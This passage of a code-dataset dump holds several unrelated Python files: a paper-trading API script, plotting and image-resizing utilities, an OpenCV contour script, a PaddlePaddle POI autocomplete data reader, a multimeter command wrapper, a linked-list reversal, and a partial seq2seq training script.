headers=HEADERS)\n\n return json.loads(r.content)\n\ndef get_orders():\n r = requests.get(ORDERS_URL, headers=HEADERS)\n\n return json.loads(r.content)\n\ndef cancel_order(order_id):\n orders_url_id = '{}/'.format(ORDERS_URL) + order_id\n\n r = requests.delete(orders_url_id, headers=HEADERS)\n\n return r\n\n#response = create_order('SE', 100, 'buy', 'market', 'gtc')\n#response = create_order('AAPL', 100, 'buy', 'market', 'gtc')\n\norders = get_orders()\nprint(orders)\n\nconfirmation = cancel_order('id_for_your_order')\nprint('\\n\\nConfirmation:')\nprint(confirmation)","sub_path":"PaperTrade/PaperTrade.py","file_name":"PaperTrade.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"420948332","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as tkr\n\ndef qpUtilPlotBuffer(ax, x, y):\n \"\"\"\n Creates narrow border around plot arrow. 
\n Prevents plot icons from being clipped by plot edges.\n \"\"\"\n xLim = ax.get_xlim()\n yLim = ax.get_ylim()\n\n xMargin = (xLim[1] - xLim[0]) * x\n yMargin = (yLim[1] - yLim[0]) * y\n\n ax.set_xlim(xLim[0] - xMargin, xLim[1] + xMargin)\n ax.set_ylim(yLim[0] - yMargin, yLim[1] + yMargin)\n\ndef qpUtilLabelFormatter(ax, xUnits = None, yUnits = None, xSize = None, ySize = None):\n \"\"\"\n Info:\n Description:\n Formats tick labels as dollars, percentages, or decimals.\n Parameters:\n ax : Axes object, default = None\n Axes object containing figure elements to be adjusted within function.\n xUnits : str, default = None\n Determines units of x-axis tick labels. None displays float. '%' displays percentages, \n '$' displays dollars.\n xSize : int or float, default = None\n x-axis label size\n yUnits : str, default = None\n Determines units of y-axis tick labels. None displays float. '%' displays percentages, \n '$' displays dollars.\n ySize : int or float, default = None\n y-axis label size\n \"\"\"\n # x-axis\n if xUnits == 'd':\n fmt = '${x:,.0f}'\n elif xUnits == 'dd':\n fmt = '${x:,.1f}'\n elif xUnits == 'ddd':\n fmt = '${x:,.2f}' \n elif xUnits == 'p':\n fmt = '{x:,.0f}%'\n elif xUnits == 'pp':\n fmt = '{x:,.1f}%'\n elif xUnits == 'ppp':\n fmt = '{x:,.2f}%'\n elif xUnits == 'f':\n fmt = '{x:,.0f}'\n elif xUnits == 'ff':\n fmt = '{x:,.1f}'\n elif xUnits == 'fff':\n fmt = '{x:,.2f}'\n elif xUnits == 'ffff':\n fmt = '{x:,.3f}'\n \n if xUnits is not None and xUnits != 's':\n tick = tkr.StrMethodFormatter(fmt)\n ax.xaxis.set_major_formatter(tick)\n\n for tk in ax.get_xticklabels():\n tk.set_fontsize(xSize)\n\n # y-axis\n if yUnits == 'd':\n fmt = '${x:,.0f}'\n elif yUnits == 'dd':\n fmt = '${x:,.1f}'\n elif yUnits == 'ddd':\n fmt = '${x:,.2f}' \n elif yUnits == 'p':\n fmt = '{x:,.0f}%'\n elif yUnits == 'pp':\n fmt = '{x:,.1f}%'\n elif yUnits == 'ppp':\n fmt = '{x:,.2f}%'\n elif yUnits == 'f':\n fmt = '{x:,.0f}'\n elif yUnits == 'ff':\n fmt = '{x:,.1f}'\n elif yUnits == 'fff':\n fmt = '{x:,.2f}'\n elif yUnits == 'ffff':\n fmt = '{x:,.3f}'\n \n if yUnits is not None and yUnits != 's':\n tick = tkr.StrMethodFormatter(fmt)\n ax.yaxis.set_major_formatter(tick)\n \n for tk in ax.get_yticklabels():\n tk.set_fontsize(ySize)\n\ndef qpUtilSetAxes(x, y, xThresh = 0.75, yThresh = 0.75):\n \"\"\"\n Dynamically set lower/upper limits of x/y axes.\n \"\"\"\n xMin = round(np.min(x), 5)\n xMax = round(np.max(x), 5)\n xChange = (xMax - xMin) / xMax\n xMin = 0 if 1.00 >= xChange >= xThresh else np.round(xMin,1)\n xMax = xMax + xMax * 0.1\n\n yMin = round(np.min(y), 5)\n yMax = round(np.max(y), 5)\n yChange = (yMax - yMin) / yMax\n yMin = 0 if 1.00 >= yChange >= yThresh else np.round(yMin,1)\n yMax = yMax + yMax * 0.1\n return xMin, xMax, yMin, yMax\n\n","sub_path":"CustomModules/quickplot/qpUtil.py","file_name":"qpUtil.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"265150859","text":"import cv2 as cv\nimport numpy as np\n\n\ndef resizeFrame(frame, dim=None, scale=None, inter=cv.INTER_AREA):\n \"\"\"Resize images or frames\n\n Args:\n frame (ndarray): image to resize\n dim (tuple, optional): Destination dimensions. Defaults to None.\n scale (float, optional): Destination scale. Defaults to None.\n inter (cv.INTER, optional): Interpolation function. 
Defaults to cv.INTER_AREA.\n\n Returns:\n ndarray: Resized frame\n \"\"\"\n if dim and not scale:\n return cv.resize(frame, dim, interpolation=inter)\n elif dim and scale:\n width = int(dim[1] * scale)\n height = int(dim[0] * scale)\n dimension = (width, height)\n return cv.resize(frame, dimension, interpolation=inter)\n elif scale:\n width = int(frame.shape[1] * scale)\n height = int(frame.shape[0] * scale)\n dimension = (width, height)\n return cv.resize(frame, dimension, interpolation=inter)\n else:\n return frame\n\n\ndef fractionFrames(frame, fraction):\n \"\"\"Calculate the fraction dimension of a frame\n\n Args:\n frame (numpy.ndarray): Image frame\n fraction (float): fraction to compute\n\n Returns:\n (width, height): the frame dimensions scaled by fraction\n \"\"\"\n return int(frame.shape[1] * (fraction)), int(frame.shape[0] * (fraction))\n\n","sub_path":"resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"419027742","text":"import sys, cv2\nimport numpy as np\n\n# read the image\nim = cv2.imread('./NumImgs/numbers100.png')\n# convert to grayscale\ngray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\nblur = cv2.GaussianBlur(gray, (5,5), 0)\n\n# convert edges to binary values (adaptive threshold), blockSize: 11, C: 2\n# separates the background from the target image\nthresh = cv2.adaptiveThreshold(blur, 255, 1,1,11,2)\n\n# extract contours\n# cv2.RETR_EXTERNAL: extract only the outermost contours\ncontours, hierarchy = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)\n\nfor cnt in contours:\n x,y,w,h = cv2.boundingRect(cnt)\n if h < 20:\n continue # skip if too small\n red = (0,0,255)\n # draw a red rectangle on im\n cv2.rectangle(im,(x,y),(x+w,y+h), red, 2)\ncv2.imwrite('./NumImgs/numbers100_cnt.png', im)\n","sub_path":"keras_07/openCV_Number2.py","file_name":"openCV_Number2.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"554074232","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n################################################################################\n# Copyright (c) 2020 PaddlePaddle Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n################################################################################\n\n\"\"\"\n Specify the brief poi_qac_personalized.py\n\"\"\"\nimport os\nimport sys\nimport six\nimport re\nimport time\nimport numpy as np\nimport random\nimport datetime\nimport paddle.fluid as fluid\n\nfrom datasets.base_dataset import BaseDataset\nfrom utils.common_lib import convert_to_unicode\n\nif six.PY2:\n reload(sys)\n sys.setdefaultencoding('utf-8')\n\nbase_rule = re.compile(\"[\\1\\2]\")\n\nclass PoiQacPersonalized(BaseDataset):\n \"\"\"\n PoiQacPersonalized dataset \n \"\"\"\n def __init__(self, flags):\n super(PoiQacPersonalized, self).__init__(flags)\n self.inited_dict = False\n\n def parse_context(self, inputs):\n \"\"\"\n provide input context\n \"\"\"\n\n \"\"\"\n set inputs_kv: please set key as the same as layer.data.name\n\n notice:\n (1)\n If user defined \"inputs key\" is different from layer.data.name,\n the frame will rewrite \"inputs key\" with layer.data.name\n (2)\n The param \"inputs\" will be passed to user defined nets class through\n the nets class interface function : net(self, FLAGS, inputs), \n \"\"\" \n inputs['prefix_letter_id'] = fluid.layers.data(name=\"prefix_letter_id\", shape=[1],\n dtype=\"int64\", lod_level=1)\n if self._flags.prefix_word_id:\n inputs['prefix_word_id'] = fluid.layers.data(name=\"prefix_word_id\", shape=[1],\n dtype=\"int64\", lod_level=1)\n if self._flags.use_geohash:\n inputs['prefix_loc_geoid'] = fluid.layers.data(name=\"prefix_loc_geoid\", shape=[40],\n dtype=\"int64\", lod_level=0)\n\n inputs['pos_name_letter_id'] = fluid.layers.data(name=\"pos_name_letter_id\", shape=[1],\n dtype=\"int64\", lod_level=1)\n inputs['pos_addr_letter_id'] = fluid.layers.data(name=\"pos_addr_letter_id\", shape=[1],\n dtype=\"int64\", lod_level=1)\n if self._flags.poi_word_id:\n inputs['pos_name_word_id'] = fluid.layers.data(name=\"pos_name_word_id\", shape=[1],\n dtype=\"int64\", lod_level=1)\n inputs['pos_addr_word_id'] = fluid.layers.data(name=\"pos_addr_word_id\", shape=[1],\n dtype=\"int64\", lod_level=1)\n if self._flags.use_geohash:\n inputs['pos_loc_geoid'] = fluid.layers.data(name=\"pos_loc_geoid\", shape=[40],\n dtype=\"int64\", lod_level=0)\n\n if self.is_training:\n inputs['neg_name_letter_id'] = fluid.layers.data(name=\"neg_name_letter_id\", shape=[1],\n dtype=\"int64\", lod_level=1)\n inputs['neg_addr_letter_id'] = fluid.layers.data(name=\"neg_addr_letter_id\", shape=[1],\n dtype=\"int64\", lod_level=1)\n \n if self._flags.poi_word_id:\n inputs['neg_name_word_id'] = fluid.layers.data(name=\"neg_name_word_id\", shape=[1],\n dtype=\"int64\", lod_level=1)\n inputs['neg_addr_word_id'] = fluid.layers.data(name=\"neg_addr_word_id\", shape=[1],\n dtype=\"int64\", lod_level=1)\n if self._flags.use_geohash:\n inputs['neg_loc_geoid'] = fluid.layers.data(name=\"neg_loc_geoid\", shape=[40],\n dtype=\"int64\", lod_level=0)\n \n else:\n #for predict label\n inputs['label'] = 
fluid.layers.data(name=\"label\", shape=[1],\n dtype=\"int64\", lod_level=0)\n inputs['qid'] = fluid.layers.data(name=\"qid\", shape=[1],\n dtype=\"int64\", lod_level=0)\n \n\n context = {\"inputs\": inputs}\n\n #set debug list, print info during training\n #context[\"debug_list\"] = [key for key in inputs] \n\n return context\n\n def _init_dict(self):\n \"\"\"\n init dict\n \"\"\"\n if self.inited_dict:\n return\n if self._flags.platform in ('local-gpu', 'pserver-gpu', 'slurm'):\n gpu_id = int(os.environ.get('FLAGS_selected_gpus', 0))\n self.place = fluid.CUDAPlace(gpu_id)\n else:\n self.place = fluid.CPUPlace()\n\n self.term_dict = {}\n if self._flags.qac_dict_path is not None:\n with open(self._flags.qac_dict_path, 'r') as f:\n for line in f:\n term, term_id = line.strip('\\r\\n').split('\\t')\n term = convert_to_unicode(term)\n self.term_dict[term] = int(term_id)\n\n self.inited_dict = True\n sys.stderr.write(\"loaded term dict:%s\\n\" % (len(self.term_dict)))\n\n def _pad_batch_data(self, insts, pad_idx, return_max_len=True, return_num_token=False):\n \"\"\"\n Pad the instances to the max sequence length in batch, and generate the\n corresponding position data and attention bias.\n \"\"\"\n return_list = []\n max_len = max(len(inst) for inst in insts)\n # Any token included in dict can be used to pad, since the paddings' loss\n # will be masked out by weights and make no effect on parameter gradients.\n inst_data = np.array(\n [inst + [pad_idx] * (max_len - len(inst)) for inst in insts])\n return_list += [inst_data.astype(\"int64\").reshape([-1, 1])]\n \n if return_max_len:\n return_list += [max_len]\n if return_num_token:\n num_token = 0\n for inst in insts:\n num_token += len(inst)\n return_list += [num_token]\n return return_list if len(return_list) > 1 else return_list[0]\n\n def _get_ids(self, seg_info):\n if len(seg_info) < 1:\n return [0], [0]\n bt = seg_info.split('\\3') \n if len(self.term_dict) < 1:\n letter_ids = map(int, bt[0].split())[:self._flags.max_seq_len]\n word_ids = map(int, bt[1].split())[:self._flags.max_seq_len]\n return letter_ids, word_ids\n\n rq = convert_to_unicode(\"\".join(bt))\n bl = [t for t in rq]\n letter_ids = [] \n for t in bl:\n letter_ids.append(self.term_dict.get(t.lower(), 1))\n if len(letter_ids) >= self._flags.max_seq_len:\n break\n\n word_ids = []\n for t in bt:\n t = convert_to_unicode(t)\n word_ids.append(self.term_dict.get(t.lower(), 1)) \n if len(word_ids) >= self._flags.max_seq_len:\n break\n return letter_ids, word_ids\n \n def _get_poi_ids(self, poi_str, max_num=0):\n if len(poi_str) < 1:\n return []\n ids = []\n all_p = poi_str.split('\\1')\n \n pidx = range(0, len(all_p))\n if max_num > 0 and len(all_p) > max_num:\n #neg sample: last 10 is negative sampling(not disp)\n neg_s_idx = len(all_p) - 10\n pidx = [1, 2] + list(random.sample(pidx[3:neg_s_idx], max_num - 13)) + list(pidx[neg_s_idx:]) \n bids = set()\n for x in pidx:\n poi_seg = all_p[x].split('\\2')\n #raw_text: name, addr, xy\n bid = poi_seg[0]\n name_letter_id, name_word_id = self._get_ids(poi_seg[0])\n addr_letter_id, addr_word_id = self._get_ids(poi_seg[1])\n ghid = list(map(int, poi_seg[2].split(','))) \n\n if not self.is_training and name_letter_id == [0]:\n continue # empty name\n if bid in bids:\n continue\n bids.add(bid)\n ids.append([name_letter_id, name_word_id, addr_letter_id, addr_word_id, ghid])\n\n return ids\n\n def deal_timestamp(self, timestamp):\n day_time_dt = datetime.datetime.fromtimestamp(timestamp)\n day = day_time_dt.strftime(\"%w\")\n time = 
day_time_dt.strftime(\"%H.%M\")\n day_id = int(day) * 2\n if 6 < float(time) < 18:\n return day_id\n else:\n return day_id + 1\n \n def parse_batch(self, data_gen):\n \"\"\"\n reader_batch must be true: only for train & loss_func is log_exp, other use parse_oneline\n pos : neg = 1 : N\n \"\"\"\n def _get_lod(k):\n return fluid.create_lod_tensor(np.array(batch_data[k][0]).reshape([-1, 1]),\n [batch_data[k][1]], self.place)\n \n batch_data = {}\n keys = None\n last_gh = None\n task_data = None\n process_batch = False\n for gh, line in data_gen:\n # print(gh)\n # print(last_gh)\n if last_gh == None:\n last_gh = gh\n task_data = [line]\n elif last_gh != gh:\n last_gh = gh\n process_batch = True\n else:\n task_data.append(line)\n\n if process_batch:\n # print(len(task_data))\n gen_data = []\n for task_line in task_data:\n # print(task_line)\n for s in self.parse_oneline(task_line):\n for k, v in s:\n if k not in batch_data:\n batch_data[k] = [[], []]\n \n if not isinstance(v[0], list):\n v = [v] #pos 1 to N\n for j in v:\n batch_data[k][0].extend(j)\n batch_data[k][1].append(len(j))\n\n if keys is None:\n keys = [k for k, _ in s]\n\n if len(batch_data[keys[0]][1]) == self._flags.train_batch_size:\n # print(keys)\n gen_data.append([(k, _get_lod(k)) for k in keys])\n batch_data = {}\n # if not self._flags.drop_last_batch and len(batch_data) != 0:\n # gen_data.append([(k, _get_lod(k)) for k in keys])\n \n # print(gen_data)\n task_data = [line]\n process_batch = False\n if len(gen_data):\n # print(len(gen_data))\n yield gen_data\n \n # if not self._flags.drop_last_batch and len(batch_data) != 0:\n # yield [(k, _get_lod(k)) for k in keys]\n\n def parse_oneline(self, line):\n \"\"\"\n datareader interface\n \"\"\"\n\n self._init_dict()\n qid, timestamp, gh, prefix, pos_poi, neg_poi = line.strip(\"\\r\\n\").split(\"\\t\")\n # day_id = self.deal_timestamp(float(timestamp))\n # day_input = [0] * 14\n # day_input[day_id] = 1\n logid = int(qid.split('_')[1])\n #step2\n prefix_loc_geoid = list(map(int, gh.split(',')))\n prefix_letter_id, prefix_word_id = self._get_ids(prefix)\n prefix_input = [(\"prefix_letter_id\", prefix_letter_id)]\n if self._flags.prefix_word_id:\n prefix_input.append((\"prefix_word_id\", prefix_word_id))\n if self._flags.use_geohash:\n prefix_input.append((\"prefix_loc_geoid\", prefix_loc_geoid))\n\n #step3\n pos_ids = self._get_poi_ids(pos_poi)\n pos_num = len(pos_ids)\n max_num = 0\n if self.is_training:\n max_num = max(20, self._flags.neg_sample_num) #last 10 is neg sample\n neg_ids = self._get_poi_ids(neg_poi, max_num=max_num)\n #if not train, add all pois\n if not self.is_training:\n pos_ids.extend(neg_ids[:-10] if len(neg_ids) > 10 else neg_ids)\n if len(pos_ids) < 1:\n pos_ids.append([[0], [0], [0], [0], [0] * 40, [0]])\n #step4\n idx = 0\n for pos_id in pos_ids:\n pos_input = [(\"pos_name_letter_id\", pos_id[0]), \\\n (\"pos_addr_letter_id\", pos_id[2])]\n if self._flags.poi_word_id:\n pos_input.append((\"pos_name_word_id\", pos_id[1]))\n pos_input.append((\"pos_addr_word_id\", pos_id[3]))\n if self._flags.use_geohash:\n pos_input.append((\"pos_loc_geoid\", pos_id[4]))\n\n if self.is_training:\n if len(neg_ids) > self._flags.neg_sample_num:\n #Noise Contrastive Estimation\n #if self._flags.neg_sample_num > 3:\n # nids_sample = neg_ids[:3]\n nids_sample = random.sample(neg_ids, self._flags.neg_sample_num)\n else:\n nids_sample = neg_ids\n\n if self._flags.reader_batch:\n if len(nids_sample) != self._flags.neg_sample_num:\n continue\n\n neg_batch = [[], [], [], [], []]\n for 
neg_id in nids_sample:\n for i in range(len(neg_batch)):\n neg_batch[i].append(neg_id[i]) \n \n neg_input = [(\"neg_name_letter_id\", neg_batch[0]), \\\n (\"neg_addr_letter_id\", neg_batch[2])]\n if self._flags.poi_word_id:\n neg_input.append((\"neg_name_word_id\", neg_batch[1]))\n neg_input.append((\"neg_addr_word_id\", neg_batch[3]))\n \n if self._flags.use_geohash:\n neg_input.append((\"neg_loc_geoid\", neg_batch[4]))\n yield prefix_input + pos_input + neg_input\n else:\n for neg_id in nids_sample:\n neg_input = [(\"neg_name_letter_id\", neg_id[0]), \\\n (\"neg_addr_letter_id\", neg_id[2])]\n if self._flags.poi_word_id:\n neg_input.append((\"neg_name_word_id\", neg_id[1]))\n neg_input.append((\"neg_addr_word_id\", neg_id[3]))\n if self._flags.use_geohash:\n neg_input.append((\"neg_loc_geoid\", neg_id[4]))\n yield prefix_input + pos_input + neg_input\n else:\n label = int(idx < pos_num)\n yield prefix_input + pos_input + [(\"label\", [label]), (\"qid\", [logid])]\n\n idx += 1\n\n\n# if __name__ == '__main__':\n# from utils import flags\n# from utils.load_conf_file import LoadConfFile\n# FLAGS = flags.FLAGS\n# flags.DEFINE_custom(\"conf_file\", \"./conf/test/test.conf\", \n# #\"conf file\", action=LoadConfFile, sec_name=\"Train\")\n# \"conf file\", action=LoadConfFile, sec_name=\"Evaluate\")\n \n# sys.stderr.write('----------- Configuration Arguments -----------\\n')\n# for arg, value in sorted(flags.get_flags_dict().items()):\n# sys.stderr.write('%s: %s\\n' % (arg, value))\n# sys.stderr.write('------------------------------------------------\\n')\n \n# dataset_instance = PoiQacPersonalized(FLAGS)\n# def _dump_vec(data, name):\n# print(\"%s\\t%s\" % (name, \" \".join(map(str, np.array(data)))))\n \n# def _data_generator(): \n# \"\"\"\n# stdin sample generator: read from stdin \n# \"\"\"\n# for line in sys.stdin:\n# if not line.strip():\n# continue\n# yield line\n\n# if FLAGS.reader_batch: \n# for sample in dataset_instance.parse_batch(_data_generator):\n# _dump_vec(sample[0][1], 'prefix_letter_id')\n# _dump_vec(sample[1][1], 'prefix_loc_geoid')\n# _dump_vec(sample[2][1], 'pos_name_letter_id')\n# _dump_vec(sample[3][1], 'pos_addr_letter_id')\n# _dump_vec(sample[6][1], 'pos_loc_geoid')\n# _dump_vec(sample[7][1], 'neg_name_letter_id or label')\n# else:\n# for line in sys.stdin:\n# for sample in dataset_instance.parse_oneline(line):\n# _dump_vec(sample[0][1], 'prefix_letter_id')\n# _dump_vec(sample[1][1], 'prefix_loc_geoid')\n# _dump_vec(sample[2][1], 'pos_name_letter_id')\n# _dump_vec(sample[3][1], 'pos_addr_letter_id')\n# _dump_vec(sample[6][1], 'pos_loc_geoid')\n# _dump_vec(sample[7][1], 'neg_name_letter_id or label')\n\n","sub_path":"ST_DM/KDD2021-MSTPAC/code/MST-PAC/datasets/poi_qac_personalized/qac_personalized.py","file_name":"qac_personalized.py","file_ext":"py","file_size_in_byte":16834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"462230495","text":"\"\"\"\nEncapsulate some of the commands to communicate with a Digital Multimeter.\n\"\"\"\nimport re\n\n_curly = re.compile(r'{.*}')\n\n\nclass _DMM1(object):\n models = ('34465A',)\n commands = {\n 'voltage': 'MEASURE:VOLTAGE:{ACDC}? 
[{RANGE}[,{RESOLUTION}]]',\n }\n\n\nclass _DMM2(object):\n models = ('3458A',)\n commands = {\n 'voltage': 'FUNC {ACDC}V[,{RANGE}[,{RESOLUTION}]]',\n }\n\n\ndef dmm_factory(connection_record, connection_class):\n \"\"\"Returns a class that encapsulates some of the commands to communicate with a Digital Multimeter.\n\n *To add a DMM to the list of supported DMMs, see the source code of this module and follow the template.*\n\n This function is not meant to be called directly. Use the :meth:`~.EquipmentRecord.connect`\n method to connect to the equipment.\n\n Parameters\n ----------\n connection_record : :class:`~.record_types.ConnectionRecord`\n A connection record from a :ref:`connections-database`.\n connection_class : :class:`~.connection_message_based.ConnectionMessageBased` or :class:`~pyvisa.resources.MessageBasedResource`\n A connection subclass that communicates with the equipment through `read` and `write` commands.\n\n Returns\n -------\n :class:`~.connection.Connection`\n The `connection_class` that was passed in with additional methods for communicating with the DMM, provided\n that the model number of the DMM is one of the DMMs that are supported. Otherwise returns the original,\n unmodified `connection_class` object.\n \"\"\"\n class DMM(connection_class):\n\n def __init__(self, record):\n \"\"\"Base class for all supported Digital Multimeters.\n\n Parameters\n ----------\n record : :class:`~.record_types.EquipmentRecord`\n A record from an :ref:`equipment-database`.\n \"\"\"\n super(DMM, self).__init__(record)\n\n def _cmd(self, key, **kwargs):\n \"\"\"Parse a formatted command string to construct the command message.\n\n Parameters\n ----------\n key : :class:`str`\n A key in the `commands` dictionary.\n kwargs\n The keyword arguments to do a \"find and replace\" in the formatted command string.\n\n Returns\n -------\n :class:`str`\n The command message to send to the equipment.\n \"\"\"\n cmd = ''\n for item in self.commands[key].split('['):\n text = re.search(_curly, item)\n if text is None:\n cmd += item\n break\n curly = text.group()\n value = kwargs[curly[1:-1]]\n if value is None:\n break\n cmd += re.sub(curly, str(value), item)\n cmd = cmd.replace(']', '').rstrip()\n self.log_debug('%s -> %s', self, cmd)\n return cmd\n\n def voltage_dc(self, range=None, resolution=None):\n cmd = self._cmd('voltage', ACDC='DC', RANGE=range, RESOLUTION=resolution)\n return float(self.query(cmd))\n\n def voltage_ac(self, range=None, resolution=None):\n cmd = self._cmd('voltage', ACDC='AC', RANGE=range, RESOLUTION=resolution)\n return float(self.query(cmd))\n\n #\n # return the _DMM# class that this model number belongs to\n #\n for cls in (_DMM1, _DMM2):\n if connection_record.model in cls.models:\n dmm = DMM\n dmm.commands = cls.commands\n return dmm\n return connection_class\n","sub_path":"msl/equipment/resources/dmm.py","file_name":"dmm.py","file_ext":"py","file_size_in_byte":3598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"98601529","text":"class ListNode:\n def __init__(self,x):\n self.val=x\n self.next=None\n\ndef ReverseList(pHead):\n pReversedHead=None\n pNode=pHead\n pPrev=None\n while pNode!=None:\n ListNew=pNode.next\n if ListNew==None:\n pReversedHead=pNode\n pNode.next=pPrev # reverse the link\n\n pPrev=pNode\n pNode=ListNew\n\n return pReversedHead\n\n\ndef GetNewChart(list):\n if list:\n node=ListNode(list.pop(0))\n node.next=GetNewChart(list)\n return node\n\nif __name__=='__main__':\n list=[1,2,3,4,5,6]\n 
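# (Editor's aside, illustrative only, not part of the original record: ReverseList
#  above reverses in a single pass by pointing each node's .next back at its
#  predecessor. For 1->2->3 the loop performs 1.next=None, 2.next=1, 3.next=2,
#  and 3 becomes pReversedHead because its successor is None. For the
#  six-element list built here, print(head.val) below therefore prints 6.)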
listN=GetNewChart(list)\n head=ReverseList(listN)\n print(head.val)\n","sub_path":"jianzhioffer/p142_24反转链表.py","file_name":"p142_24反转链表.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"484980775","text":"#!/usr/bin/env python3\nimport os\nimport random\nimport argparse\nimport logging\nimport numpy as np\nimport sys\nfrom tensorboardX import SummaryWriter\nimport time\nfrom libbots import data, model, utils\n\nimport torch\nimport torch.optim as optim\nimport torch.nn.functional as F\n\nSAVES_DIR = \"../data/saves\"\n\nBATCH_SIZE = 32\nLEARNING_RATE = 1e-3\nMAX_EPOCHES = 100\nMAX_TOKENS = 40\nMAX_TOKENS_INT = 43\n\nlog = logging.getLogger(\"train\")\n\nTEACHER_PROB = 1.0\n\nTRAIN_QUESTION_PATH = '../data/auto_QA_data/mask_even/PT_train.question'\nTRAIN_ACTION_PATH = '../data/auto_QA_data/mask_even/PT_train.action'\nDIC_PATH = '../data/auto_QA_data/share.question'\nTRAIN_QUESTION_PATH_INT = '../data/auto_QA_data/mask_even_1.0%/PT_train_INT.question'\nTRAIN_ACTION_PATH_INT = '../data/auto_QA_data/mask_even_1.0%/PT_train_INT.action'\nDIC_PATH_INT = '../data/auto_QA_data/share_INT.question'\n\ndef run_test(test_data, net, end_token, device=\"cuda\"):\n bleu_sum = 0.0\n bleu_count = 0\n for p1, p2 in test_data:\n input_seq = net.pack_input(p1, net.emb, device)\n # enc = net.encode(input_seq)\n context, enc = net.encode_context(input_seq)\n # Return logits (N*outputvocab), res_tokens (1*N)\n # Always use the first token in input sequence, which is '#BEG' as the initial input of decoder.\n # The maximum length of the output is defined in class libbots.data.\n _, tokens = net.decode_chain_argmax(enc, input_seq.data[0:1],\n seq_len=data.MAX_TOKENS,\n context = context[0],\n stop_at_token=end_token)\n bleu_sum += utils.calc_bleu(tokens, p2[1:])\n bleu_count += 1\n return bleu_sum / bleu_count\n\nif __name__ == \"__main__\":\n logging.basicConfig(format=\"%(asctime)-15s %(levelname)s %(message)s\", level=logging.INFO)\n\n # command line parameters\n sys.argv = ['train_crossent.py', '--cuda', '--n=pretrained', '--att=0', '--lstm=1', '--int', '-w2v=300']\n\n parser = argparse.ArgumentParser()\n # parser.add_argument(\"--data\", required=True, help=\"Category to use for training. \"\n # \"Empty string to train on full processDataset\")\n parser.add_argument(\"--cuda\", action='store_true', default=False,\n help=\"Enable cuda\")\n parser.add_argument(\"-n\", \"--name\", required=True, help=\"Name of the run\")\n # Choose the function to compute reward (0-1 or adaptive reward).\n # If a = true, 1 or yes, the adaptive reward is used. 
Otherwise 0-1 reward is used.\n parser.add_argument(\"--att\", type=lambda x: (str(x).lower() in ['true', '1', 'yes']),\n help=\"Using attention mechanism in seq2seq\")\n parser.add_argument(\"--lstm\", type=lambda x: (str(x).lower() in ['true', '1', 'yes']),\n help=\"Using LSTM mechanism in seq2seq\")\n # If false, the embedding tensors in the model do not need to be trained.\n parser.add_argument('--embed-grad', action='store_false', help='the embeddings would not be optimized when training')\n parser.add_argument('--int', action='store_true', help='training model with INT mask information')\n parser.add_argument(\"-w2v\", \"--word_dimension\", type=int, default=50, help=\"The dimension of the word embeddings\")\n args = parser.parse_args()\n device = torch.device(\"cuda\" if args.cuda else \"cpu\")\n log.info(\"Device info: %s\", str(device))\n\n saves_path = os.path.join(SAVES_DIR, args.name)\n os.makedirs(saves_path, exist_ok=True)\n\n # To get the input-output pairs and the relevant dictionary.\n if not args.int:\n log.info(\"Training model without INT mask information...\")\n phrase_pairs, emb_dict = data.load_data_from_existing_data(TRAIN_QUESTION_PATH, TRAIN_ACTION_PATH, DIC_PATH, MAX_TOKENS)\n\n if args.int:\n log.info(\"Training model with INT mask information...\")\n phrase_pairs, emb_dict = data.load_data_from_existing_data(TRAIN_QUESTION_PATH_INT, TRAIN_ACTION_PATH_INT, DIC_PATH_INT, MAX_TOKENS_INT)\n\n # Index -> word.\n rev_emb_dict = {idx: word for word, idx in emb_dict.items()}\n log.info(\"Obtained %d phrase pairs with %d uniq words from %s and %s.\",\n len(phrase_pairs), len(emb_dict), TRAIN_QUESTION_PATH, TRAIN_ACTION_PATH)\n data.save_emb_dict(saves_path, emb_dict)\n end_token = emb_dict[data.END_TOKEN]\n # Word -> index.\n train_data = data.encode_phrase_pairs(phrase_pairs, emb_dict)\n rand = np.random.RandomState(data.SHUFFLE_SEED)\n rand.shuffle(train_data)\n log.info(\"Training data converted, got %d samples\", len(train_data))\n train_data, test_data = data.split_train_test(train_data)\n log.info(\"Train set has %d phrases, test %d\", len(train_data), len(test_data))\n if args.att:\n log.info(\"Using attention mechanism to train the SEQ2SEQ model...\")\n if args.lstm:\n log.info(\"Using LSTM mechanism to train the SEQ2SEQ model...\")\n else:\n log.info(\"Using RNN mechanism to train the SEQ2SEQ model...\")\n\n net = model.PhraseModel(emb_size=args.word_dimension, dict_size=len(emb_dict),\n hid_size=model.HIDDEN_STATE_SIZE, LSTM_FLAG=args.lstm, ATT_FLAG=args.att).to(device)\n net.cuda()\n log.info(\"Model: %s\", net)\n\n writer = SummaryWriter(comment=\"-\" + args.name)\n\n optimiser = optim.Adam(net.parameters(), lr=LEARNING_RATE)\n best_bleu = None\n\n time_start = time.time()\n\n for epoch in range(MAX_EPOCHES):\n losses = []\n bleu_sum = 0.0\n bleu_count = 0\n dial_shown = False\n random.shuffle(train_data)\n for batch in data.iterate_batches(train_data, BATCH_SIZE):\n 